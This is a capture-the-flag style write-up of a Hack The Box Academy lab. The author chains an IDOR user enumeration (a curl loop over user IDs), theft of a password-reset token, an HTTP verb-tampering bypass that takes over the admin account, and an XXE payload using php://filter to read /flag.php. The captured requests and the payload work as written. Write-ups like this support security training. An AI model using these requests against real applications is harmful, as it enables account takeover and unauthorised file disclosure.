Skills Assessment
Task
You are performing a web application penetration test for a software development company, and they task you with testing the latest build of their social networking web application. Try to utilize the various techniques you learned in this module to identify and exploit multiple vulnerabilities found in the web application.
The login details are provided in the question below. Authenticate to with user “htb-student” and password “Academy_student!”
Try to escalate your privileges and exploit different vulnerabilities to read the flag at ‘/flag.php’.
Attempt
After logging in, this request was sent:
GET /api.php/user/74 HTTP/1.1
Host: 83.136.248.16:41942
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: */*
Referer: http://83.136.248.16:41942/profile.php
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=p8n6ip0sa52o0qpeei3327ccsc; uid=74
Connection: keep-alive
Response:
HTTP/1.1 200 OK
Date: Sun, 09 Mar 2025 02:41:08 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 90
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
{"uid":"74","username":"htb-student","full_name":"Paolo Perrone","company":"Schaefer Inc"}
If the server only relies on /74 query, it could return another user. So I sent 1 looking for the admin. I got this result:
{"uid":"1","username":"s.applewhite","full_name":"Samanta Applewhite","company":"Daniel Inc"}
Not admin but IDOR worked.
I ran a bash script:
❯ for uid in {1..100}; do curl -s "http://83.136.248.16:41942/api.php/user/$uid"; echo; done | grep -i "admin"
{"uid":"52","username":"a.corrales","full_name":"Amor Corrales","company":"Administrator"}
Now I got the username of the admin, I need to know their password.
There’s a password change feature so I captured a request:
POST /reset.php HTTP/1.1
Host: 83.136.248.16:41942
Content-Length: 62
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: http://83.136.248.16:41942
Referer: http://83.136.248.16:41942/settings.php
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=p8n6ip0sa52o0qpeei3327ccsc; uid=74
Connection: keep-alive
uid=74&token=e51a8a14-17ac-11ec-8e67-a3c050fe0c26&password=123
It uses a token so even though I changed the uid there I got access denied.
But there’s a request to get a token:
GET /api.php/token/74 HTTP/1.1
Host: 83.136.248.16:41942
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: */*
Referer: http://83.136.248.16:41942/settings.php
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=p8n6ip0sa52o0qpeei3327ccsc; uid=74
Connection: keep-alive
I got the token for uid=52 and used it to change the password. However still access denied. I used verb tampering and changed POST to GET. It successfully bypassed the restriction and now the admin password is 123.
Comparing the first user and the admin, I noticed there’s this add event feature for the admin:
POST /addEvent.php HTTP/1.1
Host: 83.136.248.16:41942
Content-Length: 167
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: http://83.136.248.16:41942
Referer: http://83.136.248.16:41942/event.php
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=p8n6ip0sa52o0qpeei3327ccsc; uid=52
Connection: keep-alive
<root>
<name>EVENTNAME</name>
<details>EVENTDETAILS</details>
<date>2025-03-09</date>
</root>
Though it doesn’t have xml declaration, from the structure it’s xml. There should be an XXE vulnerability here.
Payload:
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/flag.php" >
]>
<root>
<name>&xxe;</name>
</root>
Got the base64 encoded flag, decoded it with burp and done.